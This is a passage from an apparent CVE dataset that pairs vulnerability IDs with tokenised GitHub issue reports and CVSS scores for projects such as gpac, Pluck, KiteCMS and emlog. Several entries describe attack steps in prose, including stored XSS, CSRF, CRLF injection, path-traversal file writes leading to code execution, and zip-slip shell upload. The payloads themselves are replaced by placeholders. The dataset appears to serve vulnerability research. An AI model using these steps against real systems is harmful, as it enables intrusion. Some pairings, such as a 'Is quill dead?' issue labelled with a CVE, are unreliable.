  66197. },
  66198. {
  66199. "CVE_ID": "CVE-2021-31258",
  66200. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1706",
  66201. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1706",
  66202. "Repo_new": "gpac/gpac",
  66203. "Issue_Created_At": "2021-03-12T06:50:09Z",
  66204. "description": "null dereference issue with APITAG Hi, There is a null dereference issue with APITAG can reproduce on the lattest commit aka APITAG Steps to reproduce build with asan: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66205. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66206. "severity": "MEDIUM",
  66207. "baseScore": 5.5,
  66208. "impactScore": 3.6,
  66209. "exploitabilityScore": 1.8
  66210. },
  66211. {
  66212. "CVE_ID": "CVE-2021-31259",
  66213. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1735",
  66214. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1735",
  66215. "Repo_new": "gpac/gpac",
  66216. "Issue_Created_At": "2021-04-08T07:10:40Z",
  66217. "description": "null dereference in APITAG APITAG Hi, There is a null dereference issue with gpac APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66218. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66219. "severity": "MEDIUM",
  66220. "baseScore": 5.5,
  66221. "impactScore": 3.6,
  66222. "exploitabilityScore": 1.8
  66223. },
  66224. {
  66225. "CVE_ID": "CVE-2021-31260",
  66226. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1736",
  66227. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1736",
  66228. "Repo_new": "gpac/gpac",
  66229. "Issue_Created_At": "2021-04-08T07:11:57Z",
  66230. "description": "null dereference in APITAG APITAG Hi, There is a null dereference issue with gpac APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66231. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66232. "severity": "MEDIUM",
  66233. "baseScore": 5.5,
  66234. "impactScore": 3.6,
  66235. "exploitabilityScore": 1.8
  66236. },
  66237. {
  66238. "CVE_ID": "CVE-2021-31261",
  66239. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1737",
  66240. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1737",
  66241. "Repo_new": "gpac/gpac",
  66242. "Issue_Created_At": "2021-04-09T00:56:24Z",
  66243. "description": "FILETAG",
  66244. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  66245. "severity": "MEDIUM",
  66246. "baseScore": 5.5,
  66247. "impactScore": 3.6,
  66248. "exploitabilityScore": 1.8
  66249. },
  66250. {
  66251. "CVE_ID": "CVE-2021-31262",
  66252. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1738",
  66253. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1738",
  66254. "Repo_new": "gpac/gpac",
  66255. "Issue_Created_At": "2021-04-09T00:57:41Z",
  66256. "description": "null dereference in APITAG Hi, There is a null dereference issue with gpac APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66257. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66258. "severity": "MEDIUM",
  66259. "baseScore": 5.5,
  66260. "impactScore": 3.6,
  66261. "exploitabilityScore": 1.8
  66262. },
  66263. {
  66264. "CVE_ID": "CVE-2021-31272",
  66265. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/3991",
  66266. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/3991",
  66267. "Repo_new": "serenityos/serenity",
  66268. "Issue_Created_At": "2020-11-08T04:03:18Z",
  66269. "description": "tar: Directory traversal vulnerability may lead to privilege escalation. APITAG FILETAG Most of the file system is mounted read only. However, we can overwrite APITAG to gain privileges next time root uses APITAG .",
  66270. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  66271. "severity": "CRITICAL",
  66272. "baseScore": 9.8,
  66273. "impactScore": 5.9,
  66274. "exploitabilityScore": 3.9
  66275. },
  66276. {
  66277. "CVE_ID": "CVE-2021-31272",
  66278. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/3992",
  66279. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/3992",
  66280. "Repo_new": "serenityos/serenity",
  66281. "Issue_Created_At": "2020-11-08T04:20:52Z",
  66282. "description": "unzip: Directory traversal vulnerability may lead to command execution / privilege escalation. Same issue as NUMBERTAG in tar . FILETAG This could also be used to gain command execution on the host, or elevate privileges to the anon user from a lower privileged user, in the event that anon extracts a malicious tar file. Command execution via APITAG (as root ) or APITAG (as anon ).",
  66283. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  66284. "severity": "CRITICAL",
  66285. "baseScore": 9.8,
  66286. "impactScore": 5.9,
  66287. "exploitabilityScore": 3.9
  66288. },
  66289. {
  66290. "CVE_ID": "CVE-2021-31327",
  66291. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/14",
  66292. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/14",
  66293. "Repo_new": "remoteclinic/remoteclinic",
  66294. "Issue_Created_At": "2021-04-14T10:01:09Z",
  66295. "description": "Stored XSS vulnerability in /medicines. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG Step to Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG When you scroll down the main dashboard page, there is medicines options, Click APITAG Medicine\". FILETAG NUMBERTAG Here is a APITAG Name\" Field which is vulnerable to XSS. Inject XSS Payload: FILETAG FILETAG NUMBERTAG You can see there is client side validation on Medicine Name with maxlength is NUMBERTAG but not validate on server side. FILETAG NUMBERTAG Change maxlength to NUMBERTAG FILETAG NUMBERTAG Now Click on Register. FILETAG NUMBERTAG SS Executed on FILETAG FILETAG NUMBERTAG Now go to /medicines, Click on Show All. FILETAG NUMBERTAG SS Executed on /medicines. FILETAG",
  66296. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  66297. "severity": "MEDIUM",
  66298. "baseScore": 5.4,
  66299. "impactScore": 2.7,
  66300. "exploitabilityScore": 2.3
  66301. },
  66302. {
  66303. "CVE_ID": "CVE-2021-31329",
  66304. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/16",
  66305. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/16",
  66306. "Repo_new": "remoteclinic/remoteclinic",
  66307. "Issue_Created_At": "2021-04-14T12:58:52Z",
  66308. "description": "Stored XSS vulnerability in FILETAG . Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Step to Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG Create New Staff Member. FILETAG NUMBERTAG Register as a Doctor. FILETAG NUMBERTAG Here is two fields APITAG and APITAG Address\" which is vulnerable to XSS, inject with XSS Payload: FILETAG FILETAG NUMBERTAG Now Click on Register. FILETAG NUMBERTAG Profile Created. FILETAG NUMBERTAG Now Signout. FILETAG NUMBERTAG Login with that Staff Member which you registered as a Doctor. FILETAG NUMBERTAG Now go to My Profile. FILETAG NUMBERTAG SS Executed. FILETAG",
  66309. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  66310. "severity": "MEDIUM",
  66311. "baseScore": 5.4,
  66312. "impactScore": 2.7,
  66313. "exploitabilityScore": 2.3
  66314. },
  66315. {
  66316. "CVE_ID": "CVE-2021-31402",
  66317. "Issue_Url_old": "https://github.com/flutterchina/dio/issues/1130",
  66318. "Issue_Url_new": "https://github.com/cfug/dio/issues/1130",
  66319. "Repo_new": "cfug/dio",
  66320. "Issue_Created_At": "2021-04-15T08:40:27Z",
  66321. "description": "CRLF in APITAG sec issue. New Issue Checklist x] I have searched for a similar issue in the [project URLTAG and found none Issue Info ENV: Any Examples generated on: ERRORTAG Issue Description and Steps Please consider given snippet: CODETAG Generated call looks like CODETAG Which presents a security issue. Classic CRLF injection. Vector attack: If the attacker controls the HTTP method(verb), he can change a call and steal all cookies, session whatever is in a call. Assuming flow like USER > FOO > BAR , where flow between FOO and BAR is internal, mentioned data may leak. Let's assume I'm replacing example.com with my hackery uservice.org and the victim(service) is working in a company behind the proxy. This means I can easily redirect calls with headers/cookies(tokens) and blah blah blah. By doing more advanced CRLF I can remove the requirement for proxy at all. Expected behavior: if HTTP method(verb) is invalid, raise error.",
  66322. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66323. "severity": "HIGH",
  66324. "baseScore": 7.5,
  66325. "impactScore": 3.6,
  66326. "exploitabilityScore": 3.9
  66327. },
  66328. {
  66329. "CVE_ID": "CVE-2021-31402",
  66330. "Issue_Url_old": "https://github.com/cfug/dio/issues/1752",
  66331. "Issue_Url_new": "https://github.com/cfug/dio/issues/1752",
  66332. "Repo_new": "cfug/dio",
  66333. "Issue_Created_At": "2023-03-21T16:54:52Z",
  66334. "description": "CVE Dio NUMBERTAG Google OVS Scanner. Package dio Version NUMBERTAG Output of APITAG _No response_ Dart Version NUMBERTAG Steps to Reproduce Execute scanner in a flutter project with dio NUMBERTAG dependency. APITAG You can use Docker image from project URLTAG Expected Result Empty response from scanner. Actual Result CODETAG",
  66335. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66336. "severity": "HIGH",
  66337. "baseScore": 7.5,
  66338. "impactScore": 3.6,
  66339. "exploitabilityScore": 3.9
  66340. },
  66341. {
  66342. "CVE_ID": "CVE-2021-31407",
  66343. "Issue_Url_old": "https://github.com/vaadin/osgi/issues/50",
  66344. "Issue_Url_new": "https://github.com/vaadin/osgi/issues/50",
  66345. "Repo_new": "vaadin/osgi",
  66346. "Issue_Created_At": "2021-03-08T12:42:42Z",
  66347. "description": "Vaadin OSGi applications should not expose relevant classpath content as static resources. In our OSGi examples ( URLTAG & URLTAG class files and other resources can be accessed from the main bundles. This is unexpected behaviour from the end users point of view and can be considered a bad practise. We should either change the implementation of our integration code so that generic content from bundle(s) is not served or change the examples so that only minimal and security wise safe content is exposed.",
  66348. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66349. "severity": "HIGH",
  66350. "baseScore": 7.5,
  66351. "impactScore": 3.6,
  66352. "exploitabilityScore": 3.9
  66353. },
  66354. {
  66355. "CVE_ID": "CVE-2021-31409",
  66356. "Issue_Url_old": "https://github.com/vaadin/framework/issues/12240",
  66357. "Issue_Url_new": "https://github.com/vaadin/framework/issues/12240",
  66358. "Repo_new": "vaadin/framework",
  66359. "Issue_Created_At": "2021-03-12T11:28:18Z",
  66360. "description": "Vaadin NUMBERTAG Compatibility Server APITAG catastrophic exponential time regular expression. The issue NUMBERTAG reported yesterday as fixed in NUMBERTAG has not been addressed in vaadin compatibility server, yet. See FILETAG Could you please port the fix and provide a Vaadin NUMBERTAG release with the appropriate Vaadin NUMBERTAG compatibility implementation? Thanks!",
  66361. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  66362. "severity": "HIGH",
  66363. "baseScore": 7.5,
  66364. "impactScore": 3.6,
  66365. "exploitabilityScore": 3.9
  66366. },
  66367. {
  66368. "CVE_ID": "CVE-2021-31525",
  66369. "Issue_Url_old": "https://github.com/golang/go/issues/45710",
  66370. "Issue_Url_new": "https://github.com/golang/go/issues/45710",
  66371. "Repo_new": "golang/go",
  66372. "Issue_Created_At": "2021-04-22T19:53:59Z",
  66373. "description": "http: APITAG can stack overflow. APITAG can stack overflow due to recursion when given a request with a very large header NUMBERTAG MB depending on the architecture). A APITAG which overrides the default max header of NUMBERTAG MB by setting APITAG to a much larger value could also be vulnerable in the same way. According to the new security policy NUMBERTAG this will be fixed as a PUBLIC track issue. Credit to Guido Vranken URLTAG who reported the crash as part of the Ethereum NUMBERTAG bounty program URLTAG . /cc APITAG",
  66374. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  66375. "severity": "MEDIUM",
  66376. "baseScore": 5.9,
  66377. "impactScore": 3.6,
  66378. "exploitabilityScore": 2.2
  66379. },
  66380. {
  66381. "CVE_ID": "CVE-2021-3163",
  66382. "Issue_Url_old": "https://github.com/quilljs/quill/issues/3273",
  66383. "Issue_Url_new": "https://github.com/quilljs/quill/issues/3273",
  66384. "Repo_new": "quilljs/quill",
  66385. "Issue_Created_At": "2021-01-14T22:05:36Z",
  66386. "description": "Stored XSS in the Quill JS editor. Please describe the a concise description and fill out the details below. It will help others efficiently understand your request and get to an answer instead of repeated back and forth. Providing a minimal, complete and verifiable example URLTAG will further increase your chances that someone can help. Steps for Reproduction NUMBERTAG isit a page with the XSS scripting payload stored by an attacker (is there a more secure channel for reporting security bugs NUMBERTAG The payload executes Expected behavior : No XSS, no arbitrary Javascript execution Actual behavior : attackers can execute arbitrary Javascript Platforms : most browsers Include browser, operating system and respective versions firefox, windows NUMBERTAG ersion : Run APITAG to find out",
  66387. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  66388. "severity": "MEDIUM",
  66389. "baseScore": 6.1,
  66390. "impactScore": 2.7,
  66391. "exploitabilityScore": 2.8
  66392. },
  66393. {
  66394. "CVE_ID": "CVE-2021-3163",
  66395. "Issue_Url_old": "https://github.com/quilljs/quill/issues/3359",
  66396. "Issue_Url_new": "https://github.com/quilljs/quill/issues/3359",
  66397. "Repo_new": "quilljs/quill",
  66398. "Issue_Created_At": "2021-05-04T07:56:06Z",
  66399. "description": "Is quill dead?. No updates. Version NUMBERTAG still on development mode. No commits. Is it dead?",
  66400. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  66401. "severity": "MEDIUM",
  66402. "baseScore": 6.1,
  66403. "impactScore": 2.7,
  66404. "exploitabilityScore": 2.8
  66405. },
  66406. {
  66407. "CVE_ID": "CVE-2021-3163",
  66408. "Issue_Url_old": "https://github.com/quilljs/quill/issues/3364",
  66409. "Issue_Url_new": "https://github.com/quilljs/quill/issues/3364",
  66410. "Repo_new": "quilljs/quill",
  66411. "Issue_Created_At": "2021-05-11T14:34:05Z",
  66412. "description": "Security Issue CVETAG . Hi. I would like to raise a security issue which is described in CVETAG . Is there any fix for that or do someone know an ETA when that security issue will be fixed? Thanks in advance.",
  66413. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  66414. "severity": "MEDIUM",
  66415. "baseScore": 6.1,
  66416. "impactScore": 2.7,
  66417. "exploitabilityScore": 2.8
  66418. },
  66419. {
  66420. "CVE_ID": "CVE-2021-31663",
  66421. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/15927",
  66422. "Issue_Url_new": "https://github.com/riot-os/riot/issues/15927",
  66423. "Repo_new": "riot-os/riot",
  66424. "Issue_Created_At": "2021-02-04T13:54:14Z",
  66425. "description": "uri_parser: out of bounds read. Description I did some testing of the APITAG module as provided in APITAG . I believe I discovered an edge case where the parser performs an out of bounds read of the provided buffer. The code causing this is: URLTAG which advances APITAG without a bounds check and even if APITAG is zero APITAG is still advanced by one byte. Steps to reproduce the issue Application code: CODETAG Minimal Makefile : CODETAG Afterwards, compile as: $ make C examples/uri all asan And run the application using: $ make C examples/uri term Expected results The application shouldn't crash. Actual results ERRORTAG Versions I don't think this is needed, if you need more information let me know.",
  66426. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66427. "severity": "HIGH",
  66428. "baseScore": 7.5,
  66429. "impactScore": 3.6,
  66430. "exploitabilityScore": 3.9
  66431. },
  66432. {
  66433. "CVE_ID": "CVE-2021-31671",
  66434. "Issue_Url_old": "https://github.com/ankane/pgsync/issues/121",
  66435. "Issue_Url_new": "https://github.com/ankane/pgsync/issues/121",
  66436. "Repo_new": "ankane/pgsync",
  66437. "Issue_Created_At": "2021-04-26T22:09:39Z",
  66438. "description": "Connection security vulnerability with schema sync. CVE Identifier: CVETAG Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact pgsync drops connection parameters when syncing the schema with the APITAG and APITAG options. Some of these parameters may affect security. For instance, if sslmode is dropped, the connection may not use SSL. The first connection parameter is not affected. Here's an example where sslmode is dropped ( APITAG is not affected): APITAG This applies to both the to and from connections. All users running an affected release should upgrade immediately. Credits Thanks to Dmitriy Gunchenko for reporting this.",
  66439. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66440. "severity": "HIGH",
  66441. "baseScore": 7.5,
  66442. "impactScore": 3.6,
  66443. "exploitabilityScore": 3.9
  66444. },
  66445. {
  66446. "CVE_ID": "CVE-2021-31676",
  66447. "Issue_Url_old": "https://github.com/lazyphp/PESCMS-TEAM/issues/7",
  66448. "Issue_Url_new": "https://github.com/lazyphp/pescms-team/issues/7",
  66449. "Repo_new": "lazyphp/pescms-team",
  66450. "Issue_Created_At": "2021-04-19T09:20:03Z",
  66451. "description": "There are some vulnerabilities in cms.. Cross Site Request Forgery(CSRF NUMBERTAG modify admin's password ,mail,phone and head image. Technical Description: file : APITAG The function of this file is to Modify personal information,but it don't Verify whether the operation is legal. Through it attackers can modify admin's password ,mail,phone and head image. Proof of APITAG CODETAG FILETAG APITAG the password of admin has been modify. FILETAG Cross Site Request Forgery(CSRF NUMBERTAG Delete the administrator and other member's account number Technical Description: file: APITAG Throught it can delete Any member and administrator just by modify the 'id' that in Url. Delete the Account number of administrator just need to modify the id as NUMBERTAG FILETAG Proof of APITAG CODETAG Visit this page of poc: FILETAG FILETAG We refresh the list of user ,that find that the user that called light is deleted. FILETAG Cross Site Request Forgery(CSRF NUMBERTAG Delete import information Technical Description: file: CODETAG Through CSRF to Delete important data is exist in these files. ALL the delete operations are not verify in front page. Like this: FILETAG Proof of APITAG CODETAG FILETAG refresh: FILETAG And other operations of delete are exist on this cms. Just give the positions,don't prove. FILETAG FILETAG Reflected XSS in PATHTAG In the method of extract, the CSRF also exist , but this is to prove the Rdflected XSS,not CSRF. In line NUMBERTAG the data from $_GET('begin') and $_GET('end') is transfer to variables, and output in pages. FILETAG Proof of APITAG CODETAG FILETAG In this page APITAG XSS can be combined with CSRF,this will cause bigger destruction",
  66452. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  66453. "severity": "MEDIUM",
  66454. "baseScore": 6.1,
  66455. "impactScore": 2.7,
  66456. "exploitabilityScore": 2.8
  66457. },
  66458. {
  66459. "CVE_ID": "CVE-2021-31684",
  66460. "Issue_Url_old": "https://github.com/netplex/json-smart-v1/issues/10",
  66461. "Issue_Url_new": "https://github.com/netplex/json-smart-v1/issues/10",
  66462. "Repo_new": "netplex/json-smart-v1",
  66463. "Issue_Created_At": "2021-04-16T03:02:06Z",
  66464. "description": "ERRORTAG in parser. The parser fails to throw the ERRORTAG when the parser reads the APITAG , the following example input could cause the ERRORTAG APITAG In detail, when the parser tries to find closed single quotation mark using APITAG function, the iteration variable is not set correctly in line NUMBERTAG URLTAG It shouldn't be the pos to be checked less than len . Instead, the i should be checked. The correct way in line NUMBERTAG is: APITAG Any input with unclosed single quotation mark could trigger this. Like the input of APITAG , cause the ERRORTAG ERRORTAG",
  66465. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  66466. "severity": "HIGH",
  66467. "baseScore": 7.5,
  66468. "impactScore": 3.6,
  66469. "exploitabilityScore": 3.9
  66470. },
  66471. {
  66472. "CVE_ID": "CVE-2021-31684",
  66473. "Issue_Url_old": "https://github.com/netplex/json-smart-v2/issues/67",
  66474. "Issue_Url_new": "https://github.com/netplex/json-smart-v2/issues/67",
  66475. "Repo_new": "netplex/json-smart-v2",
  66476. "Issue_Created_At": "2021-04-16T03:21:57Z",
  66477. "description": "ERRORTAG in parser. Same as URLTAG The code base is at URLTAG It shouldn't be the pos to be checked less than len . Instead, the i should be checked. The correct way in line NUMBERTAG is: APITAG Any input with unclosed single quotation mark could trigger this. Like the input of APITAG , cause the ERRORTAG ERRORTAG",
  66478. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  66479. "severity": "HIGH",
  66480. "baseScore": 7.5,
  66481. "impactScore": 3.6,
  66482. "exploitabilityScore": 3.9
  66483. },
  66484. {
  66485. "CVE_ID": "CVE-2021-31712",
  66486. "Issue_Url_old": "https://github.com/jpuri/react-draft-wysiwyg/issues/1102",
  66487. "Issue_Url_new": "https://github.com/jpuri/react-draft-wysiwyg/issues/1102",
  66488. "Repo_new": "jpuri/react-draft-wysiwyg",
  66489. "Issue_Created_At": "2021-04-14T08:10:28Z",
  66490. "description": "XSS via Link Target. The APITAG library is not filtering the APITAG prefix. XSS can be triggered when someone clicks the link on the draft. This vulnerability can be exploited in a scenario where the draft is shared among different users (such as in a blog/content dashboard). Steps to reproduce NUMBERTAG On URLTAG insert a link NUMBERTAG Set APITAG as Link Target NUMBERTAG Hover the link and click the icon to open the link NUMBERTAG You can see the APITAG is executed under the context of APITAG . Expectation If the link starts with APITAG , don't open it. You can try another rich text editor such as URLTAG for reference. The XSS itself is triggered because of this line URLTAG ( APITAG ). The url should be validated before it reaches that line.",
  66491. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  66492. "severity": "MEDIUM",
  66493. "baseScore": 5.4,
  66494. "impactScore": 2.7,
  66495. "exploitabilityScore": 2.3
  66496. },
  66497. {
  66498. "CVE_ID": "CVE-2021-31731",
  66499. "Issue_Url_old": "https://github.com/Kitesky/KiteCMS/issues/9",
  66500. "Issue_Url_new": "https://github.com/kitesky/kitecms/issues/9",
  66501. "Repo_new": "kitesky/kitecms",
  66502. "Issue_Created_At": "2021-04-21T07:11:29Z",
  66503. "description": "Code execution vulnerability causes RCE NUMBERTAG log into the background of the site url: PATHTAG NUMBERTAG Add vulnerability URL url: PATHTAG Convert to a POST request FILETAG let contract FILETAG NUMBERTAG Access FILETAG generated in the root directory url: APITAG FILETAG Code audit The vulnerability file is located at: PATHTAG > APITAG FILETAG $path and $html We controlled,$rootpath Path splicing And the PATH variable can be passed through .. / directory The variable HTML is written to our PHP code The HTML is decoded, but it has no effect on the PHP code So we can find an existing file to overwrite the writing. POST payload is: PATHTAG APITAG Finally, the command is executed at index.PHP",
  66504. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  66505. "severity": "MEDIUM",
  66506. "baseScore": 6.5,
  66507. "impactScore": 5.2,
  66508. "exploitabilityScore": 1.2
  66509. },
  66510. {
  66511. "CVE_ID": "CVE-2021-31737",
  66512. "Issue_Url_old": "https://github.com/emlog/emlog/issues/82",
  66513. "Issue_Url_new": "https://github.com/emlog/emlog/issues/82",
  66514. "Repo_new": "emlog/emlog",
  66515. "Issue_Created_At": "2021-04-22T09:19:20Z",
  66516. "description": "Remote code execution vulnerability due to upload of database backup file in emlog NUMBERTAG emlog NUMBERTAG The vulnerable file is in \uff1a FILETAG FILETAG Whether version NUMBERTAG or version NUMBERTAG users can back up SQL database in the background FILETAG FILETAG At the same time, users can upload after modifying the database backup file, at this time, we can construct malicious SQL statements in the data to achieve the purpose of writing the shell file FILETAG FILETAG We access the generated specified malicious files to execute the code FILETAG Tested for this bug in both versions",
  66517. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  66518. "severity": "CRITICAL",
  66519. "baseScore": 9.8,
  66520. "impactScore": 5.9,
  66521. "exploitabilityScore": 3.9
  66522. },
  66523. {
  66524. "CVE_ID": "CVE-2021-31745",
  66525. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/99",
  66526. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/99",
  66527. "Repo_new": "pluck-cms/pluck",
  66528. "Issue_Created_At": "2021-04-21T03:45:08Z",
  66529. "description": "Pluck NUMBERTAG Session Fixation Vulnerability. Issue Summary A session fixation vulnerability exists within Pluck's administrative login system which can be abused to retain a valid login session even after an administrator has changed their password. Detailed Description It is possible to arbitrarily set the session ID of Pluck's \"PHPSESSID\" cookie. This cookie is used for maintaining administrative login sessions. This can be used in a session fixation attack, for example, to sustain unauthorized access to the CMS after already gaining it through a primary vulnerability. Furthermore, Pluck does not expire sessions in a timely manner nor are sessions bound in any other way. This also allows an easier brute force attack, as it is possible to brute force session IDs without rate limits imposed by the normal login process. APITAG Reproduction Steps NUMBERTAG From Google Chrome, open the developer tools menu, navigate to: Application > Storage > Cookies > APITAG NUMBERTAG Change the value of the \"PHPSESSID\" cookie to an arbitrary value, such as \"wolf NUMBERTAG Login to the pluck administrative panel, by visiting FILETAG and login to the panel NUMBERTAG On a new browser, repeat steps NUMBERTAG and NUMBERTAG On step NUMBERTAG you will be given access without being prompted for administrative credentials. Impact After any primary exploit has occurred, the session fixation attack can be used in order to sustain unauthorized access. Because Pluck does not invalidate prior sessions after a password change, access can be sustained even after an administrator performs regular remediation attempts such as resetting their password.",
  66530. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66531. "severity": "HIGH",
  66532. "baseScore": 7.5,
  66533. "impactScore": 3.6,
  66534. "exploitabilityScore": 3.9
  66535. },
  66536. {
  66537. "CVE_ID": "CVE-2021-31746",
  66538. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/100",
  66539. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/100",
  66540. "Repo_new": "pluck-cms/pluck",
  66541. "Issue_Created_At": "2021-04-21T04:09:29Z",
  66542. "description": "Pluck NUMBERTAG Zip Slip Vulnerability. Issue Summary Pluck's module and theme installers are vulnerable to directory traversal (via zip slip). Detailed Description It is possible to upload a malicious zip file in order to traverse directories outside of the intended environment, potentially allowing arbitrary code execution which will run with the permissions of the user assigned to the webserver. Reproduction Steps NUMBERTAG Using the evilarc tool URLTAG , create a zip archive containing a PHP file with a depth of NUMBERTAG APITAG NUMBERTAG isit APITAG and upload the malicious APITAG you created NUMBERTAG isit APITAG and you now have a PHP shell. Impact This vulnerability makes remote code execution under the privileges of the user running the webserver application possible.",
  66543. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  66544. "severity": "CRITICAL",
  66545. "baseScore": 9.8,
  66546. "impactScore": 5.9,
  66547. "exploitabilityScore": 3.9
  66548. },
  66549. {
  66550. "CVE_ID": "CVE-2021-31747",
  66551. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/101",
  66552. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/101",
  66553. "Repo_new": "pluck-cms/pluck",
  66554. "Issue_Created_At": "2021-04-21T17:59:48Z",
  66555. "description": "Missing SSL Certificate Validation in FILETAG . Issue Summary Pluck's update system deliberately skips SSL certificate validation. Detailed Description Within FILETAG is the following code: APITAG This ensures peer SSL certificates are never validated. Impact In theory, this vulnerability can make Pluck's update system susceptible to man-in-the-middle attacks.",
  66556. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
  66557. "severity": "MEDIUM",
  66558. "baseScore": 4.8,
  66559. "impactScore": 2.5,
  66560. "exploitabilityScore": 2.2
  66561. },
  66562. {
  66563. "CVE_ID": "CVE-2021-31783",
  66564. "Issue_Url_old": "https://github.com/Piwigo/LocalFilesEditor/issues/2",
  66565. "Issue_Url_new": "https://github.com/piwigo/localfileseditor/issues/2",
  66566. "Repo_new": "piwigo/localfileseditor",
  66567. "Issue_Created_At": "2021-04-23T13:18:54Z",
  66568. "description": "template files display may be used to display external files. Privately reported by Harry Goodman from NCC The APITAG can be used to display unexpected file on the hosting server. We need to make serious checks before any other action.",
  66569. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66570. "severity": "HIGH",
  66571. "baseScore": 7.5,
  66572. "impactScore": 3.6,
  66573. "exploitabilityScore": 3.9
  66574. },
  66575. {
  66576. "CVE_ID": "CVE-2021-31804",
  66577. "Issue_Url_old": "https://github.com/leozide/leocad/issues/645",
  66578. "Issue_Url_new": "https://github.com/leozide/leocad/issues/645",
  66579. "Repo_new": "leozide/leocad",
  66580. "Issue_Created_At": "2021-03-08T04:40:59Z",
